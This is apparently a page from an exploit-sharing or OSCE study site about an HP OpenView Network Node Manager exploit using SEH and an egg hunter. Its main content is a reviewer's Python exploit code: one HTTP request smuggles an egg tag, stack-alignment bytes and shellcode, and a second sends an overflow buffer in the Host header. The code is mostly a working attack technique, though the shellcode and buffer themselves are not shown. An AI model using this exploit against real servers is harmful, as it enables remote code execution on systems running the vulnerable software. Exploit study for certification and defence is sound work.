HP Openview NNM Exploit - SEH/Egg Hunter 0x03

HP NNM Exploit - OSCE - HP Openview Network Node Manager Exploit

  1. Eng.Nour

Recent Reviews

  1. iammarx
    iammarx
    5/5,
    This is an alternative solution in order to avoid the truncation of the shellcode:
    I split the the payload into two:

    The first one is a normal legitimate HTTP message with the egg+shellcode + the stack alignment

    The second one is the HTTP request has the malicious buffer


    #Stack Alignment
    #+"\x83\xc4\x02”

    payload1 = (
    "GET /topology/home HTTP/1.1\r\n"
    "Host: 192.168.10.10:7510\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0\r\n\r\n"
    "w00tw00t"+"\x83\xc4\x01"+shellcode
    )

    payload2 = (
    "GET /topology/home HTTP/1.1\r\n"
    "Host: " + buffer + ":7510\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0\r\n\r\n")


    s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect ((host,port))
    print "[*] Sending Normal HPNNM Request"
    s.send(payload1)
    s.close()
    time.sleep(20)





    s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect ((host,port))
    print "[*] Sending EVIL HPNNM Request"
    s.send(payload2)
    s.close()